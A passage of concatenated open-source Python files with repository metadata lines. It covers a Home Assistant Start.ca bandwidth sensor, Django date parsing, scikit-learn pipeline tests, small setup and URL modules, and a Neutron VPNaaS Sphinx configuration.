self.bandwidth_cap = bandwidth_cap
# Set unlimited users to infinite, otherwise the cap.
self.data = {"limit": self.bandwidth_cap} if self.bandwidth_cap > 0 \
else {"limit": float('inf')}
@staticmethod
def bytes_to_gb(value):
"""Convert from bytes to GB.
:param value: The value in bytes to convert to GB.
:return: Converted GB value
"""
return float(value) * 10 ** -9
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def async_update(self):
"""Get the Start.ca bandwidth data from the web service."""
import xmltodict
_LOGGER.debug("Updating Start.ca usage data")
url = 'https://www.start.ca/support/usage/api?key=' + \
self.api_key
with async_timeout.timeout(REQUEST_TIMEOUT):
req = await self.websession.get(url)
if req.status != 200:
_LOGGER.error("Request failed with status: %u", req.status)
return False
data = await req.text()
try:
xml_data = xmltodict.parse(data)
except ExpatError:
return False
used_dl = self.bytes_to_gb(xml_data['usage']['used']['download'])
used_ul = self.bytes_to_gb(xml_data['usage']['used']['upload'])
grace_dl = self.bytes_to_gb(xml_data['usage']['grace']['download'])
grace_ul = self.bytes_to_gb(xml_data['usage']['grace']['upload'])
total_dl = self.bytes_to_gb(xml_data['usage']['total']['download'])
total_ul = self.bytes_to_gb(xml_data['usage']['total']['upload'])
limit = self.data['limit']
if self.bandwidth_cap > 0:
self.data['usage'] = 100*used_dl/self.bandwidth_cap
else:
self.data['usage'] = 0
self.data['usage_gb'] = used_dl
self.data['used_download'] = used_dl
self.data['used_upload'] = used_ul
self.data['used_total'] = used_dl + used_ul
self.data['grace_download'] = grace_dl
self.data['grace_upload'] = grace_ul
self.data['grace_total'] = grace_dl + grace_ul
self.data['total_download'] = total_dl
self.data['total_upload'] = total_ul
self.data['used_remaining'] = limit - used_dl
return True
| aequitas/home-assistant | homeassistant/components/startca/sensor.py | Python | apache-2.0 | 6,361 |
from setuptools import setup, find_packages
setup(name='BIOMD0000000122',
version=20140916,
description='BIOMD0000000122 from BioModels',
url='http://www.ebi.ac.uk/biomodels-main/BIOMD0000000122',
maintainer='Stanley Gu',
maintainer_url='[email protected]',
packages=find_packages(),
package_data={'': ['*.xml', 'README.md']},
) | biomodels/BIOMD0000000122 | setup.py | Python | cc0-1.0 | 377 |
"""Functions to parse datetime objects."""
# We're using regular expressions rather than time.strptime because:
# - They provide both validation and parsing.
# - They're more flexible for datetimes.
# - The date/datetime/time constructors produce friendlier error messages.
import datetime
import re
from django.utils import six
from django.utils.timezone import get_fixed_timezone, utc
date_re = re.compile(
r'(?P<year>\d{4})-(?P<month>\d{1,2})-(?P<day>\d{1,2})$'
)
time_re = re.compile(
r'(?P<hour>\d{1,2}):(?P<minute>\d{1,2})'
r'(?::(?P<second>\d{1,2})(?:\.(?P<microsecond>\d{1,6})\d{0,6})?)?'
)
datetime_re = re.compile(
r'(?P<year>\d{4})-(?P<month>\d{1,2})-(?P<day>\d{1,2})'
r'[T ](?P<hour>\d{1,2}):(?P<minute>\d{1,2})'
r'(?::(?P<second>\d{1,2})(?:\.(?P<microsecond>\d{1,6})\d{0,6})?)?'
r'(?P<tzinfo>Z|[+-]\d{2}(?::?\d{2})?)?$'
)
standard_duration_re = re.compile(
r'^'
r'(?:(?P<days>-?\d+) (days?, )?)?'
r'((?:(?P<hours>\d+):)(?=\d+:\d+))?'
r'(?:(?P<minutes>\d+):)?'
r'(?P<seconds>\d+)'
r'(?:\.(?P<microseconds>\d{1,6})\d{0,6})?'
r'$'
)
# Support the sections of ISO 8601 date representation that are accepted by
# timedelta
iso8601_duration_re = re.compile(
r'^P'
r'(?:(?P<days>\d+(.\d+)?)D)?'
r'(?:T'
r'(?:(?P<hours>\d+(.\d+)?)H)?'
r'(?:(?P<minutes>\d+(.\d+)?)M)?'
r'(?:(?P<seconds>\d+(.\d+)?)S)?'
r')?'
r'$'
)
def parse_date(value):
"""Parses a string and return a datetime.date.
Raises ValueError if the input is well formatted but not a valid date.
Returns None if the input isn't well formatted.
"""
match = date_re.match(value)
if match:
kw = {k: int(v) for k, v in six.iteritems(match.groupdict())}
return datetime.date(**kw)
def parse_time(value):
"""Parses a string and return a datetime.time.
This function doesn't support time zone offsets.
Raises ValueError if the input is well formatted but not a valid time.
Returns None if the input isn't well formatted, in particular if it
contains an offset.
"""
match = time_re.match(value)
if match:
kw = match.groupdict()
if kw['microsecond']:
kw['microsecond'] = kw['microsecond'].ljust(6, '0')
kw = {k: int(v) for k, v in six.iteritems(kw) if v is not None}
return datetime.time(**kw)
def parse_datetime(value):
"""Parses a string and return a datetime.datetime.
This function supports time zone offsets. When the input contains one,
the output uses a timezone with a fixed offset from UTC.
Raises ValueError if the input is well formatted but not a valid datetime.
Returns None if the input isn't well formatted.
"""
match = datetime_re.match(value)
if match:
kw = match.groupdict()
if kw['microsecond']:
kw['microsecond'] = kw['microsecond'].ljust(6, '0')
tzinfo = kw.pop('tzinfo')
if tzinfo == 'Z':
tzinfo = utc
elif tzinfo is not None:
offset_mins = int(tzinfo[-2:]) if len(tzinfo) > 3 else 0
offset = 60 * int(tzinfo[1:3]) + offset_mins
if tzinfo[0] == '-':
offset = -offset
tzinfo = get_fixed_timezone(offset)
kw = {k: int(v) for k, v in six.iteritems(kw) if v is not None}
kw['tzinfo'] = tzinfo
return datetime.datetime(**kw)
def parse_duration(value):
"""Parses a duration string and returns a datetime.timedelta.
The preferred format for durations in Django is '%d %H:%M:%S.%f'.
Also supports ISO 8601 representation.
"""
match = standard_duration_re.match(value)
if not match:
match = iso8601_duration_re.match(value)
if match:
kw = match.groupdict()
if kw.get('microseconds'):
kw['microseconds'] = kw['microseconds'].ljust(6, '0')
kw = {k: float(v) for k, v in six.iteritems(kw) if v is not None}
return datetime.timedelta(**kw)
| yephper/django | django/utils/dateparse.py | Python | bsd-3-clause | 4,122 |
from unittest import TestCase
from gtfspy.routing.profile_block_analyzer import ProfileBlockAnalyzer
from gtfspy.routing.profile_block import ProfileBlock
class TestProfileBlockAnalyzer(TestCase):
def test_interpolate(self):
blocks = [ProfileBlock(0, 1, 2, 1), ProfileBlock(1, 2, 2, 2)]
analyzer = ProfileBlockAnalyzer(blocks, cutoff_distance=3.0)
self.assertAlmostEqual(analyzer.interpolate(0.2), 1.8)
self.assertAlmostEqual(analyzer.interpolate(1-10**-9), 1.)
self.assertAlmostEqual(analyzer.interpolate(1), 1)
self.assertAlmostEqual(analyzer.interpolate(1.+10**-9), 2)
self.assertAlmostEqual(analyzer.interpolate(1.23), 2)
self.assertAlmostEqual(analyzer.interpolate(2), 2)
| CxAalto/gtfspy | gtfspy/routing/test/test_profile_block_analyzer.py | Python | mit | 751 |
"""
This is not really a package init file, it is only here to simplify the
packaging and installation of pubsub.core's protocol-specific subfolders
by setuptools. The python modules in this folder are automatically made
part of pubsub.core via pubsub.core's __path__. Hence, this should not
be imported directly, it is part of pubsub.core when the messaging
protocol is "kwargs" (and not usable otherwise).
:copyright: Copyright since 2006 by Oliver Schoenborn, all rights reserved.
:license: BSD, see LICENSE_BSD_Simple.txt for details.
"""
msg = 'Should not import this directly, used by pubsub.core if applicable'
raise RuntimeError(msg) | garrettcap/Bulletproof-Backup | wx/lib/pubsub/core/kwargs/__init__.py | Python | gpl-2.0 | 646 |
"""
Test the pipeline module.
"""
import numpy as np
from scipy import sparse
from sklearn.externals.six.moves import zip
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raises_regex
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import assert_dict_equal
from sklearn.base import clone, BaseEstimator
from sklearn.pipeline import Pipeline, FeatureUnion, make_pipeline, make_union
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LinearRegression
from sklearn.cluster import KMeans
from sklearn.feature_selection import SelectKBest, f_classif
from sklearn.decomposition import PCA, TruncatedSVD
from sklearn.datasets import load_iris
from sklearn.preprocessing import StandardScaler
from sklearn.feature_extraction.text import CountVectorizer
JUNK_FOOD_DOCS = (
"the pizza pizza beer copyright",
"the pizza burger beer copyright",
"the the pizza beer beer copyright",
"the burger beer beer copyright",
"the coke burger coke copyright",
"the coke burger burger",
)
class NoFit(object):
"""Small class to test parameter dispatching.
"""
def __init__(self, a=None, b=None):
self.a = a
self.b = b
class NoTrans(NoFit):
def fit(self, X, y):
return self
def get_params(self, deep=False):
return {'a': self.a, 'b': self.b}
def set_params(self, **params):
self.a = params['a']
return self
class NoInvTransf(NoTrans):
def transform(self, X, y=None):
return X
class Transf(NoInvTransf):
def transform(self, X, y=None):
return X
def inverse_transform(self, X):
return X
class Mult(BaseEstimator):
def __init__(self, mult=1):
self.mult = mult
def fit(self, X, y):
return self
def transform(self, X):
return np.asarray(X) * self.mult
def inverse_transform(self, X):
return np.asarray(X) / self.mult
def predict(self, X):
return (np.asarray(X) * self.mult).sum(axis=1)
predict_proba = predict_log_proba = decision_function = predict
def score(self, X, y=None):
return np.sum(X)
class FitParamT(BaseEstimator):
"""Mock classifier
"""
def __init__(self):
self.successful = False
def fit(self, X, y, should_succeed=False):
self.successful = should_succeed
def predict(self, X):
return self.successful
def test_pipeline_init():
# Test the various init parameters of the pipeline.
assert_raises(TypeError, Pipeline)
# Check that we can't instantiate pipelines with objects without fit
# method
assert_raises_regex(TypeError,
'Last step of Pipeline should implement fit. '
'.*NoFit.*',
Pipeline, [('clf', NoFit())])
# Smoke test with only an estimator
clf = NoTrans()
pipe = Pipeline([('svc', clf)])
assert_equal(pipe.get_params(deep=True),
dict(svc__a=None, svc__b=None, svc=clf,
**pipe.get_params(deep=False)))
# Check that params are set
pipe.set_params(svc__a=0.1)
assert_equal(clf.a, 0.1)
assert_equal(clf.b, None)
# Smoke test the repr:
repr(pipe)
# Test with two objects
clf = SVC()
filter1 = SelectKBest(f_classif)
pipe = Pipeline([('anova', filter1), ('svc', clf)])
# Check that we can't instantiate with non-transformers on the way
# Note that NoTrans implements fit, but not transform
assert_raises_regex(TypeError,
'All intermediate steps should be transformers'
'.*\\bNoTrans\\b.*',
Pipeline, [('t', NoTrans()), ('svc', clf)])
# Check that params are set
pipe.set_params(svc__C=0.1)
assert_equal(clf.C, 0.1)
# Smoke test the repr:
repr(pipe)
# Check that params are not set when naming them wrong
assert_raises(ValueError, pipe.set_params, anova__C=0.1)
# Test clone
pipe2 = clone(pipe)
assert_false(pipe.named_steps['svc'] is pipe2.named_steps['svc'])
# Check that apart from estimators, the parameters are the same
params = pipe.get_params(deep=True)
params2 = pipe2.get_params(deep=True)
for x in pipe.get_params(deep=False):
params.pop(x)
for x in pipe2.get_params(deep=False):
params2.pop(x)
# Remove estimators that where copied
params.pop('svc')
params.pop('anova')
params2.pop('svc')
params2.pop('anova')
assert_equal(params, params2)
def test_pipeline_methods_anova():
# Test the various methods of the pipeline (anova).
iris = load_iris()
X = iris.data
y = iris.target
# Test with Anova + LogisticRegression
clf = LogisticRegression()
filter1 = SelectKBest(f_classif, k=2)
pipe = Pipeline([('anova', filter1), ('logistic', clf)])
pipe.fit(X, y)
pipe.predict(X)
pipe.predict_proba(X)
pipe.predict_log_proba(X)
pipe.score(X, y)
def test_pipeline_fit_params():
# Test that the pipeline can take fit parameters
pipe = Pipeline([('transf', Transf()), ('clf', FitParamT())])
pipe.fit(X=None, y=None, clf__should_succeed=True)
# classifier should return True
assert_true(pipe.predict(None))
# and transformer params should not be changed
assert_true(pipe.named_steps['transf'].a is None)
assert_true(pipe.named_steps['transf'].b is None)
def test_pipeline_raise_set_params_error():
# Test pipeline raises set params error message for nested models.
pipe = Pipeline([('cls', LinearRegression())])
# expected error message
error_msg = ('Invalid parameter %s for estimator %s. '
'Check the list of available parameters '
'with `estimator.get_params().keys()`.')
assert_raise_message(ValueError,
error_msg % ('fake', 'Pipeline'),
pipe.set_params,
fake='nope')
# nested model check
assert_raise_message(ValueError,
error_msg % ("fake", pipe),
pipe.set_params,
fake__estimator='nope')
def test_pipeline_methods_pca_svm():
# Test the various methods of the pipeline (pca + svm).
iris = load_iris()
X = iris.data
y = iris.target
# Test with PCA + SVC
clf = SVC(probability=True, random_state=0)
pca = PCA(svd_solver='full', n_components='mle', whiten=True)
pipe = Pipeline([('pca', pca), ('svc', clf)])
pipe.fit(X, y)
pipe.predict(X)
pipe.predict_proba(X)
pipe.predict_log_proba(X)
pipe.score(X, y)
def test_pipeline_methods_preprocessing_svm():
# Test the various methods of the pipeline (preprocessing + svm).
iris = load_iris()
X = iris.data
y = iris.target
n_samples = X.shape[0]
n_classes = len(np.unique(y))
scaler = StandardScaler()
pca = PCA(n_components=2, svd_solver='randomized', whiten=True)
clf = SVC(probability=True, random_state=0, decision_function_shape='ovr')
for preprocessing in [scaler, pca]:
pipe = Pipeline([('preprocess', preprocessing), ('svc', clf)])
pipe.fit(X, y)
# check shapes of various prediction functions
predict = pipe.predict(X)
assert_equal(predict.shape, (n_samples,))
proba = pipe.predict_proba(X)
assert_equal(proba.shape, (n_samples, n_classes))
log_proba = pipe.predict_log_proba(X)
assert_equal(log_proba.shape, (n_samples, n_classes))
decision_function = pipe.decision_function(X)
assert_equal(decision_function.shape, (n_samples, n_classes))
pipe.score(X, y)
def test_fit_predict_on_pipeline():
# test that the fit_predict method is implemented on a pipeline
# test that the fit_predict on pipeline yields same results as applying
# transform and clustering steps separately
iris = load_iris()
scaler = StandardScaler()
km = KMeans(random_state=0)
# first compute the transform and clustering step separately
scaled = scaler.fit_transform(iris.data)
separate_pred = km.fit_predict(scaled)
# use a pipeline to do the transform and clustering in one step
pipe = Pipeline([('scaler', scaler), ('Kmeans', km)])
pipeline_pred = pipe.fit_predict(iris.data)
assert_array_almost_equal(pipeline_pred, separate_pred)
def test_fit_predict_on_pipeline_without_fit_predict():
# tests that a pipeline does not have fit_predict method when final
# step of pipeline does not have fit_predict defined
scaler = StandardScaler()
pca = PCA(svd_solver='full')
pipe = Pipeline([('scaler', scaler), ('pca', pca)])
assert_raises_regex(AttributeError,
"'PCA' object has no attribute 'fit_predict'",
getattr, pipe, 'fit_predict')
def test_feature_union():
# basic sanity check for feature union
iris = load_iris()
X = iris.data
X -= X.mean(axis=0)
y = iris.target
svd = TruncatedSVD(n_components=2, random_state=0)
select = SelectKBest(k=1)
fs = FeatureUnion([("svd", svd), ("select", select)])
fs.fit(X, y)
X_transformed = fs.transform(X)
assert_equal(X_transformed.shape, (X.shape[0], 3))
# check if it does the expected thing
assert_array_almost_equal(X_transformed[:, :-1], svd.fit_transform(X))
assert_array_equal(X_transformed[:, -1],
select.fit_transform(X, y).ravel())
# test if it also works for sparse input
# We use a different svd object to control the random_state stream
fs = FeatureUnion([("svd", svd), ("select", select)])
X_sp = sparse.csr_matrix(X)
X_sp_transformed = fs.fit_transform(X_sp, y)
assert_array_almost_equal(X_transformed, X_sp_transformed.toarray())
# test setting parameters
fs.set_params(select__k=2)
assert_equal(fs.fit_transform(X, y).shape, (X.shape[0], 4))
# test it works with transformers missing fit_transform
fs = FeatureUnion([("mock", Transf()), ("svd", svd), ("select", select)])
X_transformed = fs.fit_transform(X, y)
assert_equal(X_transformed.shape, (X.shape[0], 8))
# test error if some elements do not support transform
assert_raises_regex(TypeError,
'All estimators should implement fit and '
'transform.*\\bNoTrans\\b',
FeatureUnion,
[("transform", Transf()), ("no_transform", NoTrans())])
def test_make_union():
pca = PCA(svd_solver='full')
mock = Transf()
fu = make_union(pca, mock)
names, transformers = zip(*fu.transformer_list)
assert_equal(names, ("pca", "transf"))
assert_equal(transformers, (pca, mock))
def test_pipeline_transform():
# Test whether pipeline works with a transformer at the end.
# Also test pipeline.transform and pipeline.inverse_transform
iris = load_iris()
X = iris.data
pca = PCA(n_components=2, svd_solver='full')
pipeline = Pipeline([('pca', pca)])
# test transform and fit_transform:
X_trans = pipeline.fit(X).transform(X)
X_trans2 = pipeline.fit_transform(X)
X_trans3 = pca.fit_transform(X)
assert_array_almost_equal(X_trans, X_trans2)
assert_array_almost_equal(X_trans, X_trans3)
X_back = pipeline.inverse_transform(X_trans)
X_back2 = pca.inverse_transform(X_trans)
assert_array_almost_equal(X_back, X_back2)
def test_pipeline_fit_transform():
# Test whether pipeline works with a transformer missing fit_transform
iris = load_iris()
X = iris.data
y = iris.target
transf = Transf()
pipeline = Pipeline([('mock', transf)])
# test fit_transform:
X_trans = pipeline.fit_transform(X, y)
X_trans2 = transf.fit(X, y).transform(X)
assert_array_almost_equal(X_trans, X_trans2)
def test_set_pipeline_steps():
transf1 = Transf()
transf2 = Transf()
pipeline = Pipeline([('mock', transf1)])
assert_true(pipeline.named_steps['mock'] is transf1)
# Directly setting attr
pipeline.steps = [('mock2', transf2)]
assert_true('mock' not in pipeline.named_steps)
assert_true(pipeline.named_steps['mock2'] is transf2)
assert_equal([('mock2', transf2)], pipeline.steps)
# Using set_params
pipeline.set_params(steps=[('mock', transf1)])
assert_equal([('mock', transf1)], pipeline.steps)
# Using set_params to replace single step
pipeline.set_params(mock=transf2)
assert_equal([('mock', transf2)], pipeline.steps)
# With invalid data
pipeline.set_params(steps=[('junk', ())])
assert_raises(TypeError, pipeline.fit, [[1]], [1])
assert_raises(TypeError, pipeline.fit_transform, [[1]], [1])
def test_set_pipeline_step_none():
# Test setting Pipeline steps to None
X = np.array([[1]])
y = np.array([1])
mult2 = Mult(mult=2)
mult3 = Mult(mult=3)
mult5 = Mult(mult=5)
def make():
return Pipeline([('m2', mult2), ('m3', mult3), ('last', mult5)])
pipeline = make()
exp = 2 * 3 * 5
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
pipeline.set_params(m3=None)
exp = 2 * 5
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
assert_dict_equal(pipeline.get_params(deep=True),
{'steps': pipeline.steps,
'm2': mult2,
'm3': None,
'last': mult5,
'm2__mult': 2,
'last__mult': 5,
})
pipeline.set_params(m2=None)
exp = 5
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
# for other methods, ensure no AttributeErrors on None:
other_methods = ['predict_proba', 'predict_log_proba',
'decision_function', 'transform', 'score']
for method in other_methods:
getattr(pipeline, method)(X)
pipeline.set_params(m2=mult2)
exp = 2 * 5
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
pipeline = make()
pipeline.set_params(last=None)
# mult2 and mult3 are active
exp = 6
assert_array_equal([[exp]], pipeline.fit(X, y).transform(X))
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
assert_raise_message(AttributeError,
"'NoneType' object has no attribute 'predict'",
getattr, pipeline, 'predict')
# Check None step at construction time
exp = 2 * 5
pipeline = Pipeline([('m2', mult2), ('m3', None), ('last', mult5)])
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
def test_pipeline_ducktyping():
pipeline = make_pipeline(Mult(5))
pipeline.predict
pipeline.transform
pipeline.inverse_transform
pipeline = make_pipeline(Transf())
assert_false(hasattr(pipeline, 'predict'))
pipeline.transform
pipeline.inverse_transform
pipeline = make_pipeline(None)
assert_false(hasattr(pipeline, 'predict'))
pipeline.transform
pipeline.inverse_transform
pipeline = make_pipeline(Transf(), NoInvTransf())
assert_false(hasattr(pipeline, 'predict'))
pipeline.transform
assert_false(hasattr(pipeline, 'inverse_transform'))
pipeline = make_pipeline(NoInvTransf(), Transf())
assert_false(hasattr(pipeline, 'predict'))
pipeline.transform
assert_false(hasattr(pipeline, 'inverse_transform'))
def test_make_pipeline():
t1 = Transf()
t2 = Transf()
pipe = make_pipeline(t1, t2)
assert_true(isinstance(pipe, Pipeline))
assert_equal(pipe.steps[0][0], "transf-1")
assert_equal(pipe.steps[1][0], "transf-2")
pipe = make_pipeline(t1, t2, FitParamT())
assert_true(isinstance(pipe, Pipeline))
assert_equal(pipe.steps[0][0], "transf-1")
assert_equal(pipe.steps[1][0], "transf-2")
assert_equal(pipe.steps[2][0], "fitparamt")
def test_feature_union_weights():
# test feature union with transformer weights
iris = load_iris()
X = iris.data
y = iris.target
pca = PCA(n_components=2, svd_solver='randomized', random_state=0)
select = SelectKBest(k=1)
# test using fit followed by transform
fs = FeatureUnion([("pca", pca), ("select", select)],
transformer_weights={"pca": 10})
fs.fit(X, y)
X_transformed = fs.transform(X)
# test using fit_transform
fs = FeatureUnion([("pca", pca), ("select", select)],
transformer_weights={"pca": 10})
X_fit_transformed = fs.fit_transform(X, y)
# test it works with transformers missing fit_transform
fs = FeatureUnion([("mock", Transf()), ("pca", pca), ("select", select)],
transformer_weights={"mock": 10})
X_fit_transformed_wo_method = fs.fit_transform(X, y)
# check against expected result
# We use a different pca object to control the random_state stream
assert_array_almost_equal(X_transformed[:, :-1], 10 * pca.fit_transform(X))
assert_array_equal(X_transformed[:, -1],
select.fit_transform(X, y).ravel())
assert_array_almost_equal(X_fit_transformed[:, :-1],
10 * pca.fit_transform(X))
assert_array_equal(X_fit_transformed[:, -1],
select.fit_transform(X, y).ravel())
assert_equal(X_fit_transformed_wo_method.shape, (X.shape[0], 7))
def test_feature_union_parallel():
# test that n_jobs work for FeatureUnion
X = JUNK_FOOD_DOCS
fs = FeatureUnion([
("words", CountVectorizer(analyzer='word')),
("chars", CountVectorizer(analyzer='char')),
])
fs_parallel = FeatureUnion([
("words", CountVectorizer(analyzer='word')),
("chars", CountVectorizer(analyzer='char')),
], n_jobs=2)
fs_parallel2 = FeatureUnion([
("words", CountVectorizer(analyzer='word')),
("chars", CountVectorizer(analyzer='char')),
], n_jobs=2)
fs.fit(X)
X_transformed = fs.transform(X)
assert_equal(X_transformed.shape[0], len(X))
fs_parallel.fit(X)
X_transformed_parallel = fs_parallel.transform(X)
assert_equal(X_transformed.shape, X_transformed_parallel.shape)
assert_array_equal(
X_transformed.toarray(),
X_transformed_parallel.toarray()
)
# fit_transform should behave the same
X_transformed_parallel2 = fs_parallel2.fit_transform(X)
assert_array_equal(
X_transformed.toarray(),
X_transformed_parallel2.toarray()
)
# transformers should stay fit after fit_transform
X_transformed_parallel2 = fs_parallel2.transform(X)
assert_array_equal(
X_transformed.toarray(),
X_transformed_parallel2.toarray()
)
def test_feature_union_feature_names():
word_vect = CountVectorizer(analyzer="word")
char_vect = CountVectorizer(analyzer="char_wb", ngram_range=(3, 3))
ft = FeatureUnion([("chars", char_vect), ("words", word_vect)])
ft.fit(JUNK_FOOD_DOCS)
feature_names = ft.get_feature_names()
for feat in feature_names:
assert_true("chars__" in feat or "words__" in feat)
assert_equal(len(feature_names), 35)
ft = FeatureUnion([("tr1", Transf())]).fit([[1]])
assert_raise_message(AttributeError,
'Transformer tr1 (type Transf) does not provide '
'get_feature_names', ft.get_feature_names)
def test_classes_property():
iris = load_iris()
X = iris.data
y = iris.target
reg = make_pipeline(SelectKBest(k=1), LinearRegression())
reg.fit(X, y)
assert_raises(AttributeError, getattr, reg, "classes_")
clf = make_pipeline(SelectKBest(k=1), LogisticRegression(random_state=0))
assert_raises(AttributeError, getattr, clf, "classes_")
clf.fit(X, y)
assert_array_equal(clf.classes_, np.unique(y))
def test_X1d_inverse_transform():
transformer = Transf()
pipeline = make_pipeline(transformer)
X = np.ones(10)
msg = "1d X will not be reshaped in pipeline.inverse_transform"
assert_warns_message(FutureWarning, msg, pipeline.inverse_transform, X)
def test_set_feature_union_steps():
mult2 = Mult(2)
mult2.get_feature_names = lambda: ['x2']
mult3 = Mult(3)
mult3.get_feature_names = lambda: ['x3']
mult5 = Mult(5)
mult5.get_feature_names = lambda: ['x5']
ft = FeatureUnion([('m2', mult2), ('m3', mult3)])
assert_array_equal([[2, 3]], ft.transform(np.asarray([[1]])))
assert_equal(['m2__x2', 'm3__x3'], ft.get_feature_names())
# Directly setting attr
ft.transformer_list = [('m5', mult5)]
assert_array_equal([[5]], ft.transform(np.asarray([[1]])))
assert_equal(['m5__x5'], ft.get_feature_names())
# Using set_params
ft.set_params(transformer_list=[('mock', mult3)])
assert_array_equal([[3]], ft.transform(np.asarray([[1]])))
assert_equal(['mock__x3'], ft.get_feature_names())
# Using set_params to replace single step
ft.set_params(mock=mult5)
assert_array_equal([[5]], ft.transform(np.asarray([[1]])))
assert_equal(['mock__x5'], ft.get_feature_names())
def test_set_feature_union_step_none():
mult2 = Mult(2)
mult2.get_feature_names = lambda: ['x2']
mult3 = Mult(3)
mult3.get_feature_names = lambda: ['x3']
X = np.asarray([[1]])
ft = FeatureUnion([('m2', mult2), ('m3', mult3)])
assert_array_equal([[2, 3]], ft.fit(X).transform(X))
assert_array_equal([[2, 3]], ft.fit_transform(X))
assert_equal(['m2__x2', 'm3__x3'], ft.get_feature_names())
ft.set_params(m2=None)
assert_array_equal([[3]], ft.fit(X).transform(X))
assert_array_equal([[3]], ft.fit_transform(X))
assert_equal(['m3__x3'], ft.get_feature_names())
ft.set_params(m3=None)
assert_array_equal([[]], ft.fit(X).transform(X))
assert_array_equal([[]], ft.fit_transform(X))
assert_equal([], ft.get_feature_names())
# check we can change back
ft.set_params(m3=mult3)
assert_array_equal([[3]], ft.fit(X).transform(X))
def test_step_name_validation():
bad_steps1 = [('a__q', Mult(2)), ('b', Mult(3))]
bad_steps2 = [('a', Mult(2)), ('a', Mult(3))]
for cls, param in [(Pipeline, 'steps'),
(FeatureUnion, 'transformer_list')]:
# we validate in construction (despite scikit-learn convention)
bad_steps3 = [('a', Mult(2)), (param, Mult(3))]
for bad_steps, message in [
(bad_steps1, "Step names must not contain __: got ['a__q']"),
(bad_steps2, "Names provided are not unique: ['a', 'a']"),
(bad_steps3, "Step names conflict with constructor "
"arguments: ['%s']" % param),
]:
# three ways to make invalid:
# - construction
assert_raise_message(ValueError, message, cls,
**{param: bad_steps})
# - setattr
est = cls(**{param: [('a', Mult(1))]})
setattr(est, param, bad_steps)
assert_raise_message(ValueError, message, est.fit, [[1]], [1])
assert_raise_message(ValueError, message, est.fit_transform,
[[1]], [1])
# - set_params
est = cls(**{param: [('a', Mult(1))]})
est.set_params(**{param: bad_steps})
assert_raise_message(ValueError, message, est.fit, [[1]], [1])
assert_raise_message(ValueError, message, est.fit_transform,
[[1]], [1])
| potash/scikit-learn | sklearn/tests/test_pipeline.py | Python | bsd-3-clause | 24,571 |
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('timeslot_lottery.urls')),
)
| Velmont/django-timeslot-lottery | example/example/urls.py | Python | gpl-3.0 | 211 |
# -*- coding: utf-8 -*-
# Copyright (c) 2010 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Keystone documentation build configuration file, created by
# sphinx-quickstart on Tue May 18 13:50:15 2010.
#
# This file is execfile()'d with the current directory set to it's containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, "..", ".."))
sys.path.insert(0, ROOT_DIR)
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.ifconfig',
'sphinx.ext.graphviz',
'sphinx.ext.todo',
'oslo_config.sphinxext',
'oslo_config.sphinxconfiggen',
'oslo_policy.sphinxext',
'oslo_policy.sphinxpolicygen',
'openstackdocstheme',]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master doctree document.
master_doc = 'index'
# General information about the project.
project = u'Neutron VPNaaS'
copyright = u'2011-present, OpenStack Foundation.'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['neutron_vpnaas.']
# -- Options for man page output --------------------------------------------
# Grouping the document tree for man pages.
